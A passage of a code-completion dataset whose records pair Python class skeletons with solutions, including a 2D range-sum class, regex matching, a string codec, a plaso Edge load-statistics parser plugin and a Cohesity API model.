:type row1: int :type col1: int :type row2: int :type col2: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.matrix = matrix\n row = len(matrix)\n if row:\n col = len(matrix[0])\n for i in range(0, row):\n for j in range(0, col):\n if i > 0 and j > 0:\n matrix[i][j] = matrix[i][j - 1] + matrix[i - 1][j] + matrix[i][j] - matrix[i - 1][j - 1]\n if i == 0 and j > 0:\n matrix[i][j] = matrix[i][j - 1] + matrix[i][j]\n elif j == 0 and i > 0:\n matrix[i][j] = matrix[i - 1][j] + matrix[i][j]\n self.matrix = matrix\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.matrix:\n return 0\n if row1 == 0 and col1 == 0:\n return self.matrix[row2][col2]\n if row1 == 0:\n return self.matrix[row2][col2] - self.matrix[row2][col1 - 1]\n if col1 == 0:\n return self.matrix[row2][col2] - self.matrix[row1 - 1][col2]\n return self.matrix[row2][col2] - self.matrix[row1 - 1][col2] - self.matrix[row2][col1 - 1] + self.matrix[row1 - 1][col1 - 1]\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000062", "length_bytes": 1417, "license_type": "no_license", "methods": [{"docstring": ":type matrix: List[List[int]]", "name": "__init__", "signature": "def __init__(self, matrix)"}, {"docstring": "sum of elements matrix[(row1,col1)..(row2,col2)], inclusive. :type row1: int :type col1: int :type row2: int :type col2: int :rtype: int", "name": "sumRegion", "signature": "def sumRegion(self, row1, col1, row2, col2)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001208", "prompt": "Implement the Python class `NumMatrix` described below.\n\nClass description:\nImplement the NumMatrix class.\n\nMethod signatures and docstrings:\n- def __init__(self, matrix): :type matrix: List[List[int]]\n- def sumRegion(self, row1, col1, row2, col2): sum of elements matrix[(row1,col1)..(row2,col2)], inclusive. :type row1: int :type col1: int :type row2: int :type col2: int :rtype: int", "prompted_full_text": "Implement the Python class `NumMatrix` described below.\n\nClass description:\nImplement the NumMatrix class.\n\nMethod signatures and docstrings:\n- def __init__(self, matrix): :type matrix: List[List[int]]\n- def sumRegion(self, row1, col1, row2, col2): sum of elements matrix[(row1,col1)..(row2,col2)], inclusive. :type row1: int :type col1: int :type row2: int :type col2: int :rtype: int\n\n<|skeleton|>\nclass NumMatrix:\n\n def __init__(self, matrix):\n \"\"\":type matrix: List[List[int]]\"\"\"\n <|body_0|>\n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\"sum of elements matrix[(row1,col1)..(row2,col2)], inclusive. 
:type row1: int :type col1: int :type row2: int :type col2: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.matrix = matrix\n row = len(matrix)\n if row:\n col = len(matrix[0])\n for i in range(0, row):\n for j in range(0, col):\n if i > 0 and j > 0:\n matrix[i][j] = matrix[i][j - 1] + matrix[i - 1][j] + matrix[i][j] - matrix[i - 1][j - 1]\n if i == 0 and j > 0:\n matrix[i][j] = matrix[i][j - 1] + matrix[i][j]\n elif j == 0 and i > 0:\n matrix[i][j] = matrix[i - 1][j] + matrix[i][j]\n self.matrix = matrix\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.matrix:\n return 0\n if row1 == 0 and col1 == 0:\n return self.matrix[row2][col2]\n if row1 == 0:\n return self.matrix[row2][col2] - self.matrix[row2][col1 - 1]\n if col1 == 0:\n return self.matrix[row2][col2] - self.matrix[row1 - 1][col2]\n return self.matrix[row2][col2] - self.matrix[row1 - 1][col2] - self.matrix[row2][col1 - 1] + self.matrix[row1 - 1][col1 - 1]\n<|end_body_1|>\n", "revision_id": "4599634f31d78a0372cf0ff6fb7935d054d5ecb5", "skeleton": "<|skeleton|>\nclass NumMatrix:\n\n def __init__(self, matrix):\n \"\"\":type matrix: List[List[int]]\"\"\"\n <|body_0|>\n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\"sum of elements matrix[(row1,col1)..(row2,col2)], inclusive. :type row1: int :type col1: int :type row2: int :type col2: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class NumMatrix:\n def __init__(self, matrix):\n \"\"\":type matrix: List[List[int]]\"\"\"\n self.matrix = matrix\n row = len(matrix)\n if row:\n col = len(matrix[0])\n for i in range(0, row):\n for j in range(0, col):\n if i > 0 and j > 0:\n matrix[i][j] = matrix[i][j - 1] + matrix[i - 1][j] + matrix[i][j] - matrix[i - 1][j - 1]\n if i == 0 and j > 0:\n matrix[i][j] = matrix[i][j - 1] + matrix[i][j]\n elif j == 0 and i > 0:\n matrix[i][j] = matrix[i - 1][j] + matrix[i][j]\n self.matrix = matrix\n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\"sum of elements matrix[(row1,col1)..(row2,col2)], inclusive. 
:type row1: int :type col1: int :type row2: int :type col2: int :rtype: int\"\"\"\n if not self.matrix:\n return 0\n if row1 == 0 and col1 == 0:\n return self.matrix[row2][col2]\n if row1 == 0:\n return self.matrix[row2][col2] - self.matrix[row2][col1 - 1]\n if col1 == 0:\n return self.matrix[row2][col2] - self.matrix[row1 - 1][col2]\n return self.matrix[row2][col2] - self.matrix[row1 - 1][col2] - self.matrix[row2][col1 - 1] + self.matrix[row1 - 1][col1 - 1]\n", "source": "the_stack_v2_python_sparse", "source_path": "medium/range_sum_query_2d.py", "source_repo": "jhgdike/leetCode", "split": "test", "star_events_count": 3} {"blob_id": "93d0667bffb15dcd26766440ea7a204f309186ab", "bodies": ["m, n = (len(s), len(p))\ndp = [[0] * (n + 1) for _ in range(m + 1)]\ns = ' ' + s\np = ' ' + p\ndp[0][0] = 1\nfor i in range(0, m + 1):\n for j in range(1, n + 1):\n if i > 0 and (s[i] == p[j] or p[j] == '.'):\n dp[i][j] = dp[i - 1][j - 1] | dp[i][j]\n if p[j] == '*':\n dp[i][j] = dp[i][j] | dp[i][j - 2]\n if i > 0 and (s[i] == p[j - 1] or p[j - 1] == '.'):\n print(i, j, dp[i - 1][j - 2])\n dp[i][j] = dp[i][j] | dp[i - 1][j] | dp[i - 1][j - 2]\nreturn dp[m][n] == 1", "import re\nvalue = re.match(p, s)\nif value == None or value.group(0) != s:\n return False\nelse:\n return True"], "bodies_text": "<|body_start_0|>\n m, n = (len(s), len(p))\n dp = [[0] * (n + 1) for _ in range(m + 1)]\n s = ' ' + s\n p = ' ' + p\n dp[0][0] = 1\n for i in range(0, m + 1):\n for j in range(1, n + 1):\n if i > 0 and (s[i] == p[j] or p[j] == '.'):\n dp[i][j] = dp[i - 1][j - 1] | dp[i][j]\n if p[j] == '*':\n dp[i][j] = dp[i][j] | dp[i][j - 2]\n if i > 0 and (s[i] == p[j - 1] or p[j - 1] == '.'):\n print(i, j, dp[i - 1][j - 2])\n dp[i][j] = dp[i][j] | dp[i - 1][j] | dp[i - 1][j - 2]\n return dp[m][n] == 1\n<|end_body_0|>\n\n<|body_start_1|>\n import re\n value = re.match(p, s)\n if value == None or value.group(0) != s:\n return False\n else:\n return True\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def isMatch(self, s, p):\n \"\"\":type s: str :type p: str :rtype: bool\"\"\"\n <|body_0|>\n\n def isMatch2(self, s, p):\n \"\"\"直接使用re :param s: :param p: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n m, n = (len(s), len(p))\n dp = [[0] * (n + 1) for _ in range(m + 1)]\n s = ' ' + s\n p = ' ' + p\n dp[0][0] = 1\n for i in range(0, m + 1):\n for j in range(1, n + 1):\n if i > 0 and (s[i] == p[j] or p[j] == '.'):\n dp[i][j] = dp[i - 1][j - 1] | dp[i][j]\n if p[j] == '*':\n dp[i][j] = dp[i][j] | dp[i][j - 2]\n if i > 0 and (s[i] == p[j - 1] or p[j - 1] == '.'):\n print(i, j, dp[i - 1][j - 2])\n dp[i][j] = dp[i][j] | dp[i - 1][j] | dp[i - 1][j - 2]\n return dp[m][n] == 1\n<|end_body_0|>\n\n<|body_start_1|>\n import re\n value = re.match(p, s)\n if value == None or value.group(0) != s:\n return False\n else:\n return True\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000063", "length_bytes": 2903, "license_type": "no_license", "methods": [{"docstring": ":type s: str :type p: str :rtype: bool", "name": "isMatch", "signature": "def isMatch(self, s, p)"}, {"docstring": "直接使用re :param s: :param p: :return:", "name": "isMatch2", "signature": "def isMatch2(self, s, p)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def 
isMatch(self, s, p): :type s: str :type p: str :rtype: bool\n- def isMatch2(self, s, p): 直接使用re :param s: :param p: :return:", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def isMatch(self, s, p): :type s: str :type p: str :rtype: bool\n- def isMatch2(self, s, p): 直接使用re :param s: :param p: :return:\n\n<|skeleton|>\nclass Solution:\n\n def isMatch(self, s, p):\n \"\"\":type s: str :type p: str :rtype: bool\"\"\"\n <|body_0|>\n\n def isMatch2(self, s, p):\n \"\"\"直接使用re :param s: :param p: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n m, n = (len(s), len(p))\n dp = [[0] * (n + 1) for _ in range(m + 1)]\n s = ' ' + s\n p = ' ' + p\n dp[0][0] = 1\n for i in range(0, m + 1):\n for j in range(1, n + 1):\n if i > 0 and (s[i] == p[j] or p[j] == '.'):\n dp[i][j] = dp[i - 1][j - 1] | dp[i][j]\n if p[j] == '*':\n dp[i][j] = dp[i][j] | dp[i][j - 2]\n if i > 0 and (s[i] == p[j - 1] or p[j - 1] == '.'):\n print(i, j, dp[i - 1][j - 2])\n dp[i][j] = dp[i][j] | dp[i - 1][j] | dp[i - 1][j - 2]\n return dp[m][n] == 1\n<|end_body_0|>\n\n<|body_start_1|>\n import re\n value = re.match(p, s)\n if value == None or value.group(0) != s:\n return False\n else:\n return True\n<|end_body_1|>\n", "revision_id": "5d3574ccd282d0146c83c286ae28d8baaabd4910", "skeleton": "<|skeleton|>\nclass Solution:\n\n def isMatch(self, s, p):\n \"\"\":type s: str :type p: str :rtype: bool\"\"\"\n <|body_0|>\n\n def isMatch2(self, s, p):\n \"\"\"直接使用re :param s: :param p: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def isMatch(self, s, p):\n \"\"\":type s: str :type p: str :rtype: bool\"\"\"\n m, n = (len(s), len(p))\n dp = [[0] * (n + 1) for _ in range(m + 1)]\n s = ' ' + s\n p = ' ' + p\n dp[0][0] = 1\n for i in range(0, m + 1):\n for j in range(1, n + 1):\n if i > 0 and (s[i] == p[j] or p[j] == '.'):\n dp[i][j] = dp[i - 1][j - 1] | dp[i][j]\n if p[j] == '*':\n dp[i][j] = dp[i][j] | dp[i][j - 2]\n if i > 0 and (s[i] == p[j - 1] or p[j - 1] == '.'):\n print(i, j, dp[i - 1][j - 2])\n dp[i][j] = dp[i][j] | dp[i - 1][j] | dp[i - 1][j - 2]\n return dp[m][n] == 1\n\n def isMatch2(self, s, p):\n \"\"\"直接使用re :param s: :param p: :return:\"\"\"\n import re\n value = re.match(p, s)\n if value == None or value.group(0) != s:\n return False\n else:\n return True\n", "source": "the_stack_v2_python_sparse", "source_path": "10_ 正则表达式匹配.py", "source_repo": "lovehhf/LeetCode", "split": "test", "star_events_count": 0} {"blob_id": "b94392c9c6547415326d80ff0923cb8ba9251783", "bodies": ["s = ''\nfor i in strs:\n s += str(len(i)) + '#' + i\nreturn s", "i, str = (0, [])\nwhile i < len(s):\n sharp = s.find('#', i)\n l = int(s[i:sharp])\n str.append(s[sharp + 1:sharp + l + 1])\n i = sharp + l + 1\nreturn str"], "bodies_text": "<|body_start_0|>\n s = ''\n for i in strs:\n s += str(len(i)) + '#' + i\n return s\n<|end_body_0|>\n\n<|body_start_1|>\n i, str = (0, [])\n while i < len(s):\n sharp = s.find('#', i)\n l = int(s[i:sharp])\n str.append(s[sharp + 1:sharp + l + 1])\n i = sharp + l + 1\n return str\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def encode(self, strs):\n \"\"\"Encodes a list of strings to a single string. 
:type strs: List[str] :rtype: str\"\"\"\n <|body_0|>\n\n def decode(self, s):\n \"\"\"Decodes a single string to a list of strings. :type s: str :rtype: List[str]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n s = ''\n for i in strs:\n s += str(len(i)) + '#' + i\n return s\n<|end_body_0|>\n\n<|body_start_1|>\n i, str = (0, [])\n while i < len(s):\n sharp = s.find('#', i)\n l = int(s[i:sharp])\n str.append(s[sharp + 1:sharp + l + 1])\n i = sharp + l + 1\n return str\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000064", "length_bytes": 2992, "license_type": "no_license", "methods": [{"docstring": "Encodes a list of strings to a single string. :type strs: List[str] :rtype: str", "name": "encode", "signature": "def encode(self, strs)"}, {"docstring": "Decodes a single string to a list of strings. :type s: str :rtype: List[str]", "name": "decode", "signature": "def decode(self, s)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006708", "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def encode(self, strs): Encodes a list of strings to a single string. :type strs: List[str] :rtype: str\n- def decode(self, s): Decodes a single string to a list of strings. :type s: str :rtype: List[str]", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def encode(self, strs): Encodes a list of strings to a single string. :type strs: List[str] :rtype: str\n- def decode(self, s): Decodes a single string to a list of strings. :type s: str :rtype: List[str]\n\n<|skeleton|>\nclass Codec:\n\n def encode(self, strs):\n \"\"\"Encodes a list of strings to a single string. :type strs: List[str] :rtype: str\"\"\"\n <|body_0|>\n\n def decode(self, s):\n \"\"\"Decodes a single string to a list of strings. :type s: str :rtype: List[str]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n s = ''\n for i in strs:\n s += str(len(i)) + '#' + i\n return s\n<|end_body_0|>\n\n<|body_start_1|>\n i, str = (0, [])\n while i < len(s):\n sharp = s.find('#', i)\n l = int(s[i:sharp])\n str.append(s[sharp + 1:sharp + l + 1])\n i = sharp + l + 1\n return str\n<|end_body_1|>\n", "revision_id": "05e8f5a4e39d448eb333c813093fc7c1df4fc05e", "skeleton": "<|skeleton|>\nclass Codec:\n\n def encode(self, strs):\n \"\"\"Encodes a list of strings to a single string. :type strs: List[str] :rtype: str\"\"\"\n <|body_0|>\n\n def decode(self, s):\n \"\"\"Decodes a single string to a list of strings. :type s: str :rtype: List[str]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def encode(self, strs):\n \"\"\"Encodes a list of strings to a single string. :type strs: List[str] :rtype: str\"\"\"\n s = ''\n for i in strs:\n s += str(len(i)) + '#' + i\n return s\n\n def decode(self, s):\n \"\"\"Decodes a single string to a list of strings. 
:type s: str :rtype: List[str]\"\"\"\n i, str = (0, [])\n while i < len(s):\n sharp = s.find('#', i)\n l = int(s[i:sharp])\n str.append(s[sharp + 1:sharp + l + 1])\n i = sharp + l + 1\n return str\n", "source": "the_stack_v2_python_sparse", "source_path": "leetcode_python/String/encode-and-decode-strings.py", "source_repo": "DataEngDev/CS_basics", "split": "test", "star_events_count": 0} {"blob_id": "d73b6f6562be46bd81d441c08eb73cbe2720ea9f", "bodies": ["timestamp = self._GetRowValue(query_hash, row, value_name)\nif timestamp is None:\n return None\nreturn dfdatetime_webkit_time.WebKitTime(timestamp=timestamp)", "query_hash = hash(query)\nevent_data = EdgeLoadStatisticsResourceEventData()\nevent_data.last_update = self._GetWebKitDateTimeRowValue(query_hash, row, 'last_update')\nevent_data.query = query\nevent_data.resource_hostname = self._GetRowValue(query_hash, row, 'resource_hostname')\nevent_data.resource_type = self._GetRowValue(query_hash, row, 'resource_type')\nevent_data.top_level_hostname = self._GetRowValue(query_hash, row, 'top_level_hostname')\nparser_mediator.ProduceEventData(event_data)"], "bodies_text": "<|body_start_0|>\n timestamp = self._GetRowValue(query_hash, row, value_name)\n if timestamp is None:\n return None\n return dfdatetime_webkit_time.WebKitTime(timestamp=timestamp)\n<|end_body_0|>\n\n<|body_start_1|>\n query_hash = hash(query)\n event_data = EdgeLoadStatisticsResourceEventData()\n event_data.last_update = self._GetWebKitDateTimeRowValue(query_hash, row, 'last_update')\n event_data.query = query\n event_data.resource_hostname = self._GetRowValue(query_hash, row, 'resource_hostname')\n event_data.resource_type = self._GetRowValue(query_hash, row, 'resource_type')\n event_data.top_level_hostname = self._GetRowValue(query_hash, row, 'top_level_hostname')\n parser_mediator.ProduceEventData(event_data)\n<|end_body_1|>\n", "class_docstring": "SQLite parser plugin for Microsoft Edge load statistics database.", "class_name": "EdgeLoadStatisticsPlugin", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass EdgeLoadStatisticsPlugin:\n \"\"\"SQLite parser plugin for Microsoft Edge load statistics database.\"\"\"\n\n def _GetWebKitDateTimeRowValue(self, query_hash, row, value_name):\n \"\"\"Retrieves a WebKit date and time value from the row. Args: query_hash (int): hash of the query, that uniquely identifies the query that produced the row. row (sqlite3.Row): row. value_name (str): name of the value. Returns: dfdatetime.WebKitTime: date and time value or None if not available.\"\"\"\n <|body_0|>\n\n def ParseResourceRow(self, parser_mediator, query, row, **unused_kwargs):\n \"\"\"Parses a row from the database. Args: parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs. query (str): query that created the row. 
row (sqlite3.Row): row resulting from query.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n timestamp = self._GetRowValue(query_hash, row, value_name)\n if timestamp is None:\n return None\n return dfdatetime_webkit_time.WebKitTime(timestamp=timestamp)\n<|end_body_0|>\n\n<|body_start_1|>\n query_hash = hash(query)\n event_data = EdgeLoadStatisticsResourceEventData()\n event_data.last_update = self._GetWebKitDateTimeRowValue(query_hash, row, 'last_update')\n event_data.query = query\n event_data.resource_hostname = self._GetRowValue(query_hash, row, 'resource_hostname')\n event_data.resource_type = self._GetRowValue(query_hash, row, 'resource_type')\n event_data.top_level_hostname = self._GetRowValue(query_hash, row, 'top_level_hostname')\n parser_mediator.ProduceEventData(event_data)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000065", "length_bytes": 4267, "license_type": "permissive", "methods": [{"docstring": "Retrieves a WebKit date and time value from the row. Args: query_hash (int): hash of the query, that uniquely identifies the query that produced the row. row (sqlite3.Row): row. value_name (str): name of the value. Returns: dfdatetime.WebKitTime: date and time value or None if not available.", "name": "_GetWebKitDateTimeRowValue", "signature": "def _GetWebKitDateTimeRowValue(self, query_hash, row, value_name)"}, {"docstring": "Parses a row from the database. Args: parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs. query (str): query that created the row. row (sqlite3.Row): row resulting from query.", "name": "ParseResourceRow", "signature": "def ParseResourceRow(self, parser_mediator, query, row, **unused_kwargs)"}], "n_methods": 2, "prompt": "Implement the Python class `EdgeLoadStatisticsPlugin` described below.\n\nClass description:\nSQLite parser plugin for Microsoft Edge load statistics database.\n\nMethod signatures and docstrings:\n- def _GetWebKitDateTimeRowValue(self, query_hash, row, value_name): Retrieves a WebKit date and time value from the row. Args: query_hash (int): hash of the query, that uniquely identifies the query that produced the row. row (sqlite3.Row): row. value_name (str): name of the value. Returns: dfdatetime.WebKitTime: date and time value or None if not available.\n- def ParseResourceRow(self, parser_mediator, query, row, **unused_kwargs): Parses a row from the database. Args: parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs. query (str): query that created the row. row (sqlite3.Row): row resulting from query.", "prompted_full_text": "Implement the Python class `EdgeLoadStatisticsPlugin` described below.\n\nClass description:\nSQLite parser plugin for Microsoft Edge load statistics database.\n\nMethod signatures and docstrings:\n- def _GetWebKitDateTimeRowValue(self, query_hash, row, value_name): Retrieves a WebKit date and time value from the row. Args: query_hash (int): hash of the query, that uniquely identifies the query that produced the row. row (sqlite3.Row): row. value_name (str): name of the value. Returns: dfdatetime.WebKitTime: date and time value or None if not available.\n- def ParseResourceRow(self, parser_mediator, query, row, **unused_kwargs): Parses a row from the database. Args: parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs. query (str): query that created the row. 
row (sqlite3.Row): row resulting from query.\n\n<|skeleton|>\nclass EdgeLoadStatisticsPlugin:\n \"\"\"SQLite parser plugin for Microsoft Edge load statistics database.\"\"\"\n\n def _GetWebKitDateTimeRowValue(self, query_hash, row, value_name):\n \"\"\"Retrieves a WebKit date and time value from the row. Args: query_hash (int): hash of the query, that uniquely identifies the query that produced the row. row (sqlite3.Row): row. value_name (str): name of the value. Returns: dfdatetime.WebKitTime: date and time value or None if not available.\"\"\"\n <|body_0|>\n\n def ParseResourceRow(self, parser_mediator, query, row, **unused_kwargs):\n \"\"\"Parses a row from the database. Args: parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs. query (str): query that created the row. row (sqlite3.Row): row resulting from query.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n timestamp = self._GetRowValue(query_hash, row, value_name)\n if timestamp is None:\n return None\n return dfdatetime_webkit_time.WebKitTime(timestamp=timestamp)\n<|end_body_0|>\n\n<|body_start_1|>\n query_hash = hash(query)\n event_data = EdgeLoadStatisticsResourceEventData()\n event_data.last_update = self._GetWebKitDateTimeRowValue(query_hash, row, 'last_update')\n event_data.query = query\n event_data.resource_hostname = self._GetRowValue(query_hash, row, 'resource_hostname')\n event_data.resource_type = self._GetRowValue(query_hash, row, 'resource_type')\n event_data.top_level_hostname = self._GetRowValue(query_hash, row, 'top_level_hostname')\n parser_mediator.ProduceEventData(event_data)\n<|end_body_1|>\n", "revision_id": "d6022f8cfebfddf2d08ab2d300a41b61f3349933", "skeleton": "<|skeleton|>\nclass EdgeLoadStatisticsPlugin:\n \"\"\"SQLite parser plugin for Microsoft Edge load statistics database.\"\"\"\n\n def _GetWebKitDateTimeRowValue(self, query_hash, row, value_name):\n \"\"\"Retrieves a WebKit date and time value from the row. Args: query_hash (int): hash of the query, that uniquely identifies the query that produced the row. row (sqlite3.Row): row. value_name (str): name of the value. Returns: dfdatetime.WebKitTime: date and time value or None if not available.\"\"\"\n <|body_0|>\n\n def ParseResourceRow(self, parser_mediator, query, row, **unused_kwargs):\n \"\"\"Parses a row from the database. Args: parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs. query (str): query that created the row. row (sqlite3.Row): row resulting from query.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class EdgeLoadStatisticsPlugin:\n \"\"\"SQLite parser plugin for Microsoft Edge load statistics database.\"\"\"\n\n def _GetWebKitDateTimeRowValue(self, query_hash, row, value_name):\n \"\"\"Retrieves a WebKit date and time value from the row. Args: query_hash (int): hash of the query, that uniquely identifies the query that produced the row. row (sqlite3.Row): row. value_name (str): name of the value. Returns: dfdatetime.WebKitTime: date and time value or None if not available.\"\"\"\n timestamp = self._GetRowValue(query_hash, row, value_name)\n if timestamp is None:\n return None\n return dfdatetime_webkit_time.WebKitTime(timestamp=timestamp)\n\n def ParseResourceRow(self, parser_mediator, query, row, **unused_kwargs):\n \"\"\"Parses a row from the database. 
Args: parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs. query (str): query that created the row. row (sqlite3.Row): row resulting from query.\"\"\"\n query_hash = hash(query)\n event_data = EdgeLoadStatisticsResourceEventData()\n event_data.last_update = self._GetWebKitDateTimeRowValue(query_hash, row, 'last_update')\n event_data.query = query\n event_data.resource_hostname = self._GetRowValue(query_hash, row, 'resource_hostname')\n event_data.resource_type = self._GetRowValue(query_hash, row, 'resource_type')\n event_data.top_level_hostname = self._GetRowValue(query_hash, row, 'top_level_hostname')\n parser_mediator.ProduceEventData(event_data)\n", "source": "the_stack_v2_python_sparse", "source_path": "plaso/parsers/sqlite_plugins/edge_load_statistics.py", "source_repo": "log2timeline/plaso", "split": "test", "star_events_count": 1506} {"blob_id": "471b6c5d618d82dbd364029b6b42337c010eb8ed", "bodies": ["self.num_logical_bytes_transferred = num_logical_bytes_transferred\nself.num_physical_bytes_transferred = num_physical_bytes_transferred\nself.task_name = task_name\nself.task_type = task_type", "if dictionary is None:\n return None\nnum_logical_bytes_transferred = dictionary.get('numLogicalBytesTransferred')\nnum_physical_bytes_transferred = dictionary.get('numPhysicalBytesTransferred')\ntask_name = dictionary.get('taskName')\ntask_type = dictionary.get('taskType')\nreturn cls(num_logical_bytes_transferred, num_physical_bytes_transferred, task_name, task_type)"], "bodies_text": "<|body_start_0|>\n self.num_logical_bytes_transferred = num_logical_bytes_transferred\n self.num_physical_bytes_transferred = num_physical_bytes_transferred\n self.task_name = task_name\n self.task_type = task_type\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n num_logical_bytes_transferred = dictionary.get('numLogicalBytesTransferred')\n num_physical_bytes_transferred = dictionary.get('numPhysicalBytesTransferred')\n task_name = dictionary.get('taskName')\n task_type = dictionary.get('taskType')\n return cls(num_logical_bytes_transferred, num_physical_bytes_transferred, task_name, task_type)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'DataTransferFromVaultPerTask' model. Specifies statistics about the transfer of data from a Vault (External Target) to this Cohesity Cluster for a recover or clone task. Attributes: num_logical_bytes_transferred (long|int): Specifies the total number of logical bytes that are transferred from this Vault to the Cohesity Cluster for this task. The logical size is when the data is fully hydrated or expanded. num_physical_bytes_transferred (long|int): Specifies the total number of physical bytes that are transferred from this Vault to the Cohesity Cluster for this task. task_name (string): Specifies the task name. task_type (string): Specifies the task type.", "class_name": "DataTransferFromVaultPerTask", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DataTransferFromVaultPerTask:\n \"\"\"Implementation of the 'DataTransferFromVaultPerTask' model. Specifies statistics about the transfer of data from a Vault (External Target) to this Cohesity Cluster for a recover or clone task. Attributes: num_logical_bytes_transferred (long|int): Specifies the total number of logical bytes that are transferred from this Vault to the Cohesity Cluster for this task. 
The logical size is when the data is fully hydrated or expanded. num_physical_bytes_transferred (long|int): Specifies the total number of physical bytes that are transferred from this Vault to the Cohesity Cluster for this task. task_name (string): Specifies the task name. task_type (string): Specifies the task type.\"\"\"\n\n def __init__(self, num_logical_bytes_transferred=None, num_physical_bytes_transferred=None, task_name=None, task_type=None):\n \"\"\"Constructor for the DataTransferFromVaultPerTask class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.num_logical_bytes_transferred = num_logical_bytes_transferred\n self.num_physical_bytes_transferred = num_physical_bytes_transferred\n self.task_name = task_name\n self.task_type = task_type\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n num_logical_bytes_transferred = dictionary.get('numLogicalBytesTransferred')\n num_physical_bytes_transferred = dictionary.get('numPhysicalBytesTransferred')\n task_name = dictionary.get('taskName')\n task_type = dictionary.get('taskType')\n return cls(num_logical_bytes_transferred, num_physical_bytes_transferred, task_name, task_type)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000066", "length_bytes": 2796, "license_type": "permissive", "methods": [{"docstring": "Constructor for the DataTransferFromVaultPerTask class", "name": "__init__", "signature": "def __init__(self, num_logical_bytes_transferred=None, num_physical_bytes_transferred=None, task_name=None, task_type=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "prompt": "Implement the Python class `DataTransferFromVaultPerTask` described below.\n\nClass description:\nImplementation of the 'DataTransferFromVaultPerTask' model. Specifies statistics about the transfer of data from a Vault (External Target) to this Cohesity Cluster for a recover or clone task. Attributes: num_logical_bytes_transferred (long|int): Specifies the total number of logical bytes that are transferred from this Vault to the Cohesity Cluster for this task. The logical size is when the data is fully hydrated or expanded. num_physical_bytes_transferred (long|int): Specifies the total number of physical bytes that are transferred from this Vault to the Cohesity Cluster for this task. task_name (string): Specifies the task name. 
